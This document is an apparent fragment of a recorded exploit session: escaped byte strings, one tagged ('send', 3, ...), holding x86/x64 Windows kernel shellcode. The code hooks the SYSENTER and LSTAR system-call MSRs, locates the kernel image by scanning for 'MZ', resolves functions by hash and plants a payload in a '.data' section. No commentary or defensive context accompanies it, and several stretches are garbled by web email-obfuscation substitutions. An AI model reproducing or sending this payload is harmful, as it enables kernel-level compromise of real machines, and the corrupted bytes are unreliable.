b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', \"('send', 3, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 